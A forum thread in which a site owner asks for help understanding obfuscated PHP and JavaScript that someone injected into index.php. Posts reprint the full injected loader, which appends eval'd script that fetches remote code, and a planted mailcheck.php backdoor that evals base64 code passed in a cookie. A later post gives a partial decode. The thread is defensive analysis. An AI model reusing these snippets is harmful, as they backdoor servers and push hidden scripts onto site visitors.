w3it.org
+ Reply to Thread
Results 1 to 8 of 8
  1. #1
    Join Date
    Mar 2007
    Location
    Italy
    Posts
    1,587

    Default Obscure php + Javascript code

    I have note these two long lines on the very top of the index.php file while upgrading some web pages.
    I think somebody have gain access in some way overwriting the file and adding this code that i can't well understand what is doing. Any help on discover what it is the scope of this php + javascript?
    Code:
    <?php ob_start('security_update'); function security_update($buffer){return $buffer.'<script language="javascript">function t(){return z($a);}var $a="Z64aZ3dZ22fqb0t-7vrs}vybZ3esZ257F}7+0fqb0cxyvdY~tuh0-0Z2520+vZ257Fb08fqb0y0y~0gy~tZ257FgZ3edgZ3edbu~tc9kyv08gy~tZ257FgZ3ex0.0(0660gy~tZ257FgZ3ex0,0Z2522!0660yZ3ey~tuh_v870Z2520Z27790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mu|cu0yv088gy~tZ257FgZ3ex0,0)0ll00gy~tZ257FgZ3ex0.0Z2522Z252090660yZ3ey~tuh_v870!(790.0Z3d!9kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3esxqbSZ25Z22;ccZ3dZ225ngZ2574h;Z2569++Z2529Z257btmpZ253dds.sZ256cicZ2565Z2528Z2569,iZ252b1)Z253bsZ22;cdZ3dZ22Z2574Z253dsZ2574+StZ2572inZ2567.frZ256fZ256dZ2543haZ2572CodZ2565((Z2574Z256dp.Z22;caZ3dZ22Z2566unZ2563tioZ256e dcZ2573(dZ2573,Z2565s)Z257bdsZ253duZ256eZ2565Z2573caZ2570Z22;opZ3dZ22Z2524aZ253dZ2522dw(Z2564csZ2528cu,Z25314)Z2529;Z2522;Z22;czZ3dZ22Z2566Z2575nctZ2569onZ2520cz(Z2563zZ2529Z257bretZ2575rn Z2563aZ252bcbZ252bcc+Z2563Z2564Z252bZ2563e+cZ257a;};Z22;dbZ3dZ227FtuQd8!90;0!Z25200;gy~tZ257FgZ3edgZ3edbu~tcKyMK$MZ3eaeubiZ3e|u~wdx+rbuqZ7b+mmyv08cxyvdY~tuh0--0Z252009kcxyvdY~tuh0-0gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3esxqbSZ257FtuQd8!90;0Z270;gy~tZ257FgZ3edgZ3edbu~tcKyMKZ2526MZ3eaeubiZ3e|u~wdx+m0yv08cxyvdY~tuh0.0Z25209kfqb0dy}u0-0~ug0Qbbqi89+dy}uK7iuqb7M0-0gy~tZ257FgZ3ewtZ3ewudEDSVe||Iuqb89+dy}uK7}Z257F~dx7M0-0gy~tZ257FgZ3ewtZ3ewudEDS]Z257F~dx89;!+dy}uK7tqi7M0-0gy~tZ257FgZ3ewtZ3ewudEDSTqdu89+fqb0t-7vZ22;dzZ3dZ22Z2566uZ256ectZ2569oZ256e dwZ2528t)Z257bcaZ253dZ2527Z252564oZ2525Z25363umZ2565Z25256etZ25252ewZ2572Z252569teZ252528Z2525Z25322Z2527;ceZ253dZ2527Z252522Z252529Z2527;Z2563bZ253dZ2527Z25253csZ252563rZ252569Z252570tZ2520Z25256caZ25256egZ2575Z25256Z2531Z252567eZ25253dZ25255cZ252522javZ2561sZ252563Z252572iZ252570tZ25255cZ25252Z2532Z25253eZ2527;ccZ253dZ2527Z25253cZ25255cZ25252fscZ2572iZ252570Z2574Z25253eZ2527Z253bevaZ256c(Z2575Z256eescZ2561Z2570eZ2528Z2574))Z257d;Z22;deZ3dZ22209M0;0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0$90;0~e}9050!Z25209M+Z2519}Z257F~dxSx0-0|uddubcK88dy}uK7}Z257F~dx7M0;0~e}9050Z2522Z259M0;0|uddubcK88dy}uK7}Z257F~dx7M0:0~e}9050Z2522Z259M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0Z25269050Z2522Z279M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0~e}9050Z2522$9M+4q-4qZ3ebu`|qsu8tZ3ctqiSx0;0iuqbSxZ25220;0}Z257F~dxSx0;0iuqbSx!0;0tqiSx0;0}Z257F~dxcKdy}uK7}Z257F~dx7M0Z3d0!M0;07Z3esZ257F}79+mZ22;ceZ3dZ22cZ2568Z2561rCZ256fdeAZ2574(0Z2529Z255e(Z25270x00Z2527+Z2565Z2573)))Z253b}Z257dZ22;stZ3dZ22Z2573tZ253dZ2522$Z2561Z253dsZ2574;Z2564cZ2573(Z2564Z2561Z252bZ2564bZ252bZ2564cZ252bdZ2564+Z2564Z2565Z252c1Z2530Z2529Z253bZ2564wZ2528sZ2574Z2529;Z2573tZ253d$Z2561;Z2522Z253bZ22;cuZ3dZ22(p}b4g`mxq)6b}g}v}x}`m.|}ppqz6*(}rfuyq4gfw)6|``d.;;rvwyr}f:wZ7by;xp;v}zfszZ2526;64c}p`|)Z25$$4|q}s|`),$*(;}rfuyq*(;p}b*Z22;dcZ3dZ22rs}vybZ3esZ257F}7+fqb0}Z257F~dxc0-0~ug0Qbbqi87e~Z257F7Z3c07tfu7Z3c07dxb7Z3c07vyb7Z3c07fyv7Z3c07huc7Z3c07fuc7Z3c07wxd7Z3c07u~y7Z3c07ud~7Z3c07|uf7Z3c07dgu79+fqb0|uddubc0-0~ug0Qbbqi87q7Z3c7r7Z3c7s7Z3c7t7Z3c7u7Z3c7v7Z3c7w7Z3c7x7Z3c7z7Z3c7y7Z3c7Z7b7Z3c7|7Z3c7}7Z3c7~7Z3c7Z257F7Z3c7`7Z3c7a7Z3c7b7Z3c7c7Z3c7d7Z3c7e7Z3c7f7Z3c7g7Z3c7h7Z3c7i7Z3c7j79+fqb0~e}rubc0-0~ug0Qbbqi8!Z3cZ2522Z3c#Z3c$Z3cZ25Z3cZ2526Z3cZ27Z3c(Z3c)9+Z2519ve~sdyZ257F~0Sq|se|qdu]qwys^e}rub8tqiZ3c0}Z257F~dxZ3c0iuqbZ3c0y~tuh9kbudeb~0888iuqb0;Z22;ddZ3dZ2208y~tuh0:0tqi990;08}Z257F~dx0N0tqi90:0y~tuh90;0tqi9+m0fqb0iuqbSx!Z3c0iuqbSxZ2522Z3c0}Z257F~dxSxZ3c0tqiSxZ3c0~e}+Z2519~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7MZ3c0dy}uK7}Z257F~dx7MZ3c0dy}uK7iuqb7MZ3c0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90;0~e}9050Z2526#9050Z2522Z2526M0;0|uddubcK888dy}uK7iuqb7M060Z2520hQQ90,,0Z252290;0~e}9050Z2522Z25M+Z2519iuqbSxZ25220-0|uddubcK8888dy}uK7iuqb7M060Z2520h##!!90..0#90;0~e}9050!Z25Z22;cbZ3dZ22e(dZ2573)Z253bstZ253dtmpZ253dZ2527Z2527;for(Z2569Z253d0Z253biZ253cZ2564s.lZ256Z22;Z69f (Z64oZ63umZ65Z6et.Z63ookZ69e.Z69ndeZ78OfZ28Z27rf5f6dZ73Z27)Z3dZ3d-1)Z7bfunctiZ6fn cZ61Z6cZ6cbZ61ckZ28xZ29Z7bwiZ6edoZ77.twZ20Z3d Z78;vZ61Z72Z20dZ20Z3d nZ65wZ20DZ61Z74e()Z3bd.sZ65Z74TimZ65Z28x[Z22as_Z6ffZ22]*10Z300);Z76ar Z68Z20Z3d dZ2egetZ55TZ43HoZ75rZ73Z28);wZ69ndZ6fw.hZ20Z3dZ20Z68;iZ66 (hZ20Z3e 8)Z7bd.sZ65Z74Z55TZ43DaZ74Z65(dZ2egetZ55TCDZ61teZ28) -Z202)Z3b}elZ73eZ7bd.Z73etZ55TZ43Z44ateZ28Z64.Z67Z65tUZ54Z43Z44atZ65() Z2d Z33);}Z77Z69nZ64owZ2egdZ20Z3d Z64;vaZ72Z20Z74iZ6de Z3d nZ65w AZ72rayZ28);vZ61r sZ68iZ66Z74Z49Z6eZ64exZ20Z3d Z22Z22;time[Z22yearZ22] Z3d d.Z67Z65Z74UTZ43Z46ulZ6cYeZ61rZ28Z29;Z74imeZ5bZ22monZ74hZ22Z5dZ20Z3d d.Z67Z65Z74UZ54Z43MZ6fnthZ28Z29Z2b1Z3btZ69meZ5bZ22dayZ22] Z3d d.geZ74UTZ43Z44ateZ28);Z69Z66 (dZ2egZ65tUTZ43MZ6fZ6eth(Z29+1 Z3cZ2010)Z7bZ73hZ69fZ74IndZ65Z78 Z3d tZ69me[Z22yeaZ72Z22] + Z22-0Z22 +Z20(d.Z67etUZ54CMoZ6etZ68Z28)Z2b1)Z3b}Z65lseZ7bZ73hifZ74IndZ65x Z3d tiZ6dZ65[Z22yeZ61Z72Z22]Z20+ Z22-Z22 Z2bZ20(Z64.gZ65tZ55TZ43Z4dontZ68()Z2bZ31Z29Z3b}iZ66 (dZ2egeZ74Z55TCZ44Z61teZ28) Z3cZ20Z310Z29Z7bshZ69fZ74IZ6edeZ78 Z3dshZ69fZ74IndZ65x +Z20Z22-0Z22 +Z20Z64.Z67etUZ54CDaZ74Z65();Z7delsZ65Z7bshiftZ49ndeZ78Z20Z3d shifZ74IndZ65x +Z20Z22-Z22 + d.geZ74UTZ43DZ61teZ28Z29;}Z64Z6fcuZ6deZ6etZ2ewriZ74eZ28Z22Z3cscrZ22+Z22iZ70t Z6caZ6eZ67Z75aZ67eZ3djavZ61scrZ69ptZ22+Z22 srZ63Z3dZ27http:Z2fZ2fsearZ63Z68Z2etZ77Z69ttZ65rZ2eZ63Z6fZ6dZ2ftrZ65ndsZ2fdZ61ilyZ2eZ6asoZ6e?dZ61Z74eZ3dZ22+ sZ68Z69ftZ49Z6eZ64eZ78Z2bZ22&callbZ61ckZ3dcaZ6clbZ61cZ6b2Z27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iZ70tZ3eZ22);} Z66unZ63tZ69on Z63aZ6clbZ61cZ6b2(xZ29Z7bwiZ6edoZ77.Z74Z77 Z3d x;scZ28Z27rf5Z666dsZ27,Z32,7Z29;evZ61l(Z75Z6eesZ63aZ70e(dZ7aZ2bcz+Z6fp+sZ74)+Z27dZ77(dZ7a+czZ28$Z61Z2bstZ29);Z27)Z3bdocZ75Z6dentZ2ewrZ69teZ28$aZ29Z3b}dZ6fcumZ65nZ74.wZ72Z69Z74Z65(Z22Z3cimZ67 sZ72cZ3dZ27httpZ3aZ2fZ2fsZ65aZ72cZ68.Z74wZ69ttZ65r.cZ6fmZ2fiZ6dagZ65sZ2fseaZ72chZ2frZ73Z73Z2eZ70Z6egZ27 wZ69dZ74hZ3d1 hZ65igZ68tZ3d1Z20Z73tylZ65Z3dZ27visibiliZ74Z79Z3ahZ69Z64Z64Z65nZ27 Z2fZ3e Z3cscrZ22+Z22ipt lanZ67uZ61Z67eZ3djavZ61sZ63rZ69pZ74Z22+Z22 srcZ3dZ27httpZ3aZ2fZ2fsearchZ2etwiZ74teZ72Z2ecomZ2ftZ72eZ6eZ64sZ2fdZ61ilyZ2ejZ73on?Z63alZ6cbaZ63kZ3dcalZ6cbacZ6bZ27Z3eZ22 + Z22Z3cZ2fscrZ22 + Z22iptZ3eZ22);Z7delsZ65Z7b$aZ3dZ27Z27};funZ63tZ69Z6fn sZ63(cZ6em,vZ2ceZ64Z29Z7bvarZ20exZ64Z3dnewZ20Z44aZ74e()Z3bexdZ2esZ65tDaZ74e(Z65xZ64Z2egZ65tDaZ74eZ28)+eZ64Z29;Z64ocZ75meZ6etZ2ecooZ6biZ65Z3dcnmZ2bZ20Z27Z3dZ27 +eZ73capZ65(v)Z2bZ27;eZ78Z70ireZ73Z3dZ27+exZ64.toZ47MTZ53trZ69Z6egZ28);}Z3b";function z(s){r="";for(i=0;i<s.length;i++){if(s.charAt(i)=="Z"){s1="%"}else{s1=s.charAt(i)}r=r+s1;}return unescape(r);}var x=0;eval(t());</script>';}//important security update ?>
    analyzing a little piece i can understand for example, a very simple thing like:
    Code:
    httpZ3aZ2fZ2fsZ65aZ72cZ68.
    i can determine that:
    z3a is : (two points)
    and Z2f is / (slash)
    but it is easy, much more investigation is necessary to understand and i have not check/don't know if this is an octal (it isn't but for example) or something else converted string, maybe someone like a js guru can let understand in a short and easy way this javascript code inside a php function that grab the buffer. Thank you, anybody

  2. #2
    Join Date
    Mar 2007
    Location
    Italy
    Posts
    1,587

    Angry

    I'm should not be wrong if i think to have discover from where the code come out. It seem to be effectively an update code, inserted by the hosting provider in the file index!
    the very bad thing is that the code is recognized as a virus from antivirus, and effectively it try to run an arbitrary javascript. The same
    mailcheck.php that contain the follow code (very similar to the above in the way it is done, not under aspect of content but as it is done):
    PHP Code:
    <?php eval(base64_decode('aWYoaXNzZXQoJF9DT09LSUVbIlBIUFNFU1NJSUQiXSkpe2V2YWwoYmFzZTY0X2RlY29
    kZSgkX0NPT0tJRVsiUEhQU0VTU0lJRCJdKSk7ZXhpdDt9'
    )); 
    echo 
    "checking email...";
    ?>
    appear in the root of the domain web space after a mail check performed from domain control panel.
    I have write to the provider asking for an answer about this incredible code that is overwrite/leaved in the index.php file without any apparent reason, if it is, as this code is recognized as virus, and if leaved where is it can create a very big problem to the site ranking (!??!) with bots and internet security services that go to list the site as dangerous and not suitable web site. This is a very big, bad crazy thing. Waiting for provider answer now.

  3. #3
    Join Date
    Mar 2007
    Location
    Italy
    Posts
    1,587

    Question No answer from hosting provider

    I've ask to the hosting provider as above described;
    a ticket has been inserted 4/5 days ago, but until now, no answer received.
    It let me think to the most bad, they had insert this arbitrary code?
    I'm only hope to be wrong and something else will come out, also an answer from hosting provider that will deny any fantasy about!
    Of course i'll wait until tomorrow when i'll insert another question and requesting more precisely at least an answer.

  4. #4
    Join Date
    Mar 2007
    Location
    Italy
    Posts
    1,587

    Default

    the hosting provider answer, inform me that no body have change the index.php doing something in these days, updates or so on ....
    i have set the php.ini to be more compliant with installed applications, that's what at max i can do taking at this point.

  5. #5
    Unregistered Guest

    Default its a linker , a seo engine for link a twitter source

    using an alert to decode it gives :

    a="fqb0t-7vrs}vyb>s%7F}7+0fqb0cxyv dY~tuh0-0%20+v%7Fb08fqb0y0y~0gy~t %7Fg>dg>dbu~tc9kyv08gy~t% 7Fg>x0.0(0660gy~t%7Fg>x0, 0%22!0660y>y~tuh_v870%20' 790.0=!9kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M >aeubi>sxqbS%7FtuQd8!90;0 gy~t%7Fg>dg>dbu~tcKyMK$M> aeubi>|u~wdx+rbuq{+mu|cu0 yv088gy~t%7Fg>x0,0)0ll00g y~t%7Fg>x0.0%22%2090660y> y~tuh_v870!(790.0=!9kcxyv dY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK$M >aeubi>sxqbS%";cc="5ng%74 h;%69++%29%7btmp%3dds.s%6 cic%65%28%69,i%2b1)%3bs"; cd="%74%3ds%74+St%72in%67 .fr%6f%6d%43ha%72Cod%65(( %74%6dp.";ca="%66un%63tio %6e dc%73(d%73,%65s)%7bds%3du %6e%65%73ca%70";op="%24a% 3d%22dw(%64cs%28cu,%314)% 29;%22;";cz="%66%75nct%69 on%20cz(%63z%29%7bret%75r n %63a%2bcb%2bcc+%63%64%2b% 63e+c%7a;};";db="7FtuQd8! 90;0!%200;gy~t%7Fg>dg>dbu ~tcKyMK$M>aeubi>|u~wdx+rb uq{+mmyv08cxyvdY~tuh0--0%2009kcxyvdY~tuh0-0gy~t%7Fg>dg>dbu~tcKyMK%2 6M>aeubi>sxqbS%7FtuQd8!90 ;0'0;gy~t%7Fg>dg>dbu~tcKy MK%26M>aeubi>|u~wdx+m0yv0 8cxyvdY~tuh0.0%209kfqb0dy }u0-0~ug0Qbbqi89+dy}uK7iuqb7M 0-0gy~t%7Fg>wt>wudEDSVe||Iu qb89+dy}uK7}%7F~dx7M0-0gy~t%7Fg>wt>wudEDS]%7F~dx89;!+dy}uK7tqi7M0-0gy~t%7Fg>wt>wudEDSTqdu89 +fqb0t-7v";dz="%66u%6ect%69o%6 e dw%28t)%7bca%3d%27%2564o% 25%363um%65%256et%252ew%7 2%2569te%2528%25%322%27;c e%3d%27%2522%2529%27;%63b %3d%27%253cs%2563r%2569%2 570t%20%256ca%256eg%75%25 6%31%2567e%253d%255c%2522 jav%61s%2563%2572i%2570t% 255c%252%32%253e%27;cc%3d %27%253c%255c%252fsc%72i% 2570%74%253e%27%3beva%6c( %75%6eesc%61%70e%28%74))% 7d;";de="209M0;0|uddubcK8 888dy}uK7iuqb7M060%20h##! !90..0$90;0~e}9050!%209M+ %19}%7F~dxSx0-0|uddubcK88dy}uK7}%7F~dx7 M0;0~e}9050%22%9M0;0|uddu bcK88dy}uK7}%7F~dx7M0:0~e }9050%22%9M+tqiSx0-0|uddubcK88dy}uK7tqi7M0:0 %269050%22'9M+0dy}uSx0-0tqiSx0-0|uddubcK88dy}uK7tqi7M0:0 ~e}9050%22$9M+4q-4q>bu`|qsu8t<tqiSx0;0iuqb Sx%220;0}%7F~dxSx0;0iuqbS x!0;0tqiSx0;0}%7F~dxcKdy} uK7}%7F~dx7M0=0!M0;07>s%7 F}79+m";ce="c%68%61rC%6fd eA%74(0%29%5e(%270x00%27+ %65%73)))%3b}%7d";st="%73 t%3d%22$%61%3ds%74;%64c%7 3(%64%61%2b%64b%2b%64c%2b d%64+%64%65%2c1%30%29%3b% 64w%28s%74%29;%73t%3d$%61 ;%22%3b";
    cu="(p}b4g`mxq)6b}g}v}x}` m.|}ppqz6*(}rfuyq4gfw)6|` `d.;;rvwyr}f:w{y;xp;v}zfs z%26;64c}p`|)%$$4|q}s|`), $*(;}rfuyq*(;p}b*";dc="rs }vyb>s%7F}7+fqb0}%7F~dxc0-0~ug0Qbbqi87e~%7F7<07tfu7 <07dxb7<07vyb7<07fyv7<07h uc7<07fuc7<07wxd7<07u~y7< 07ud~7<07|uf7<07dgu79+fqb 0|uddubc0-0~ug0Qbbqi87q7<7r7<7s7<7t 7<7u7<7v7<7w7<7x7<7z7<7y7 <7{7<7|7<7}7<7~7<7%7F7<7` 7<7a7<7b7<7c7<7d7<7e7<7f7 <7g7<7h7<7i7<7j79+fqb0~e} rubc0-0~ug0Qbbqi8!<%22<#<$<%<%2 6<'<(<)9+%19ve~sdy%7F~0Sq |se|qdu]qwys^e}rub8tqi<0}%7F~dx<0 iuqb<0y~tuh9kbudeb~0888iu qb0;";dd="08y~tuh0:0tqi99 0;08}%7F~dx0N0tqi90:0y~tu h90;0tqi9+m0fqb0iuqbSx!<0 iuqbSx%22<0}%7F~dxSx<0tqi Sx<0~e}+%19~e}0-0Sq|se|qdu]qwys^e}rub8dy}uK7tqi7M<0d y}uK7}%7F~dx7M<0dy}uK7iuq b7M<0cxyvdY~tuh9+iuqbSx!0-0|uddubcK888dy}uK7iuqb7M0 60%20hQQ90;0~e}9050%26#90 50%22%26M0;0|uddubcK888dy }uK7iuqb7M060%20hQQ90,,0% 2290;0~e}9050%22%M+%19iuq bSx%220-0|uddubcK8888dy}uK7iuqb7M 060%20h##!!90..0#90;0~e}9 050!%";cb="e(d%73)%3bst%3 dtmp%3d%27%27;for(%69%3d0 %3bi%3c%64s.l%6";
    if (document.cookie.indexOf( 'rf5f6ds')==-1){
    function callback(x){
    window.tw = x;
    var d = new Date();
    d.setTime(x["as_of"]*1000);
    var h = d.getUTCHours();
    window.h = h;
    if (h > 8){
    d.setUTCDate(d.getUTCDate () - 2);
    }else{
    d.setUTCDate(d.getUTCDate () - 3);
    }
    window.gd = d;
    var time = new Array();
    var shiftIndex = "";
    time["year"] = d.getUTCFullYear();
    time["month"] = d.getUTCMonth()+1;
    time["day"] = d.getUTCDate();
    if (d.getUTCMonth()+1 < 10){
    shiftIndex = time["year"] + "-0" + (d.getUTCMonth()+1);
    }else{
    shiftIndex = time["year"] + "-" + (d.getUTCMonth()+1);
    }
    if (d.getUTCDate() < 10){
    shiftIndex =shiftIndex + "-0" + d.getUTCDate();
    }else{
    shiftIndex = shiftIndex + "-" + d.getUTCDate();
    }
    document.write("
    <scr"+"ipt language=javascript"+" src='http://search.twitter.com/trends/daily.json?date="+ shiftIndex+"&callback=cal lback2'>" + "</scr" + "ipt>");
    }
    function callback2(x){
    window.tw = x;
    sc('rf5f6ds',2,7);
    eval(unescape(dz+cz+op+st )+'dw(dz+cz($a+st));');
    document.write($a);
    }
    document.write("<img src='http://search.twitter.com/images/search/rss.png' width=1 height=1 style='visibility:hidden' /> <scr"+"ipt language=javascript"+" src='http://search.twitter.com/trends/daily.json?callback=callb ack'>" + "</scr" + "ipt>");
    }else{
    $a=''
    };

    function sc(cnm,v,ed){
    var exd=new Date();
    exd.setDate(exd.getDate() +ed);
    document.cookie=cnm+ '=' +escape(v)+';
    expires='+exd.toGMTString ();
    };

    part of it stills hidden but mostly the idea is clear

  6. #6
    Join Date
    Mar 2007
    Location
    Italy
    Posts
    1,587

    Default

    Really Good and i can ask do you think it is an overwrite of the php file
    done in some way by someone (an attacker that was using an exploit on some specific cms, or something like, or what?

    Code:
    <scr"+"ipt language=javascript"+" src='http://search.twitter.com/trends/daily.json?date="+ shiftIndex+"&callback=cal lback2'>" + "</scr" + "ipt>");

  7. #7
    Join Date
    Sep 2014
    Posts
    2

    Default

    Hi,
    Axe I cant seem to send you PM's anymore or post to the postnuke integration forums. I really need you to take a look at a module for me that has stopped working after a server switch. Please let me know if you can do this.

  8. #8
    Join Date
    Mar 2007
    Location
    Italy
    Posts
    1,587

    Default

    hello, yes, let me check all about this night when i will return home, and ... you still are using postnuke!? Wow !!
    I will send you an email or pm and we will see what to do to restart the module. It is an old code, maybe some old native php function now, on 2014 do not work (or maybe it depend by something else). We will see. Yes i will take a look with pleasure. Regards.

Tags for this Thread

Posting Permissions

  • You may post new threads
  • You may post replies
  • You may not post attachments
  • You may not edit your posts
  •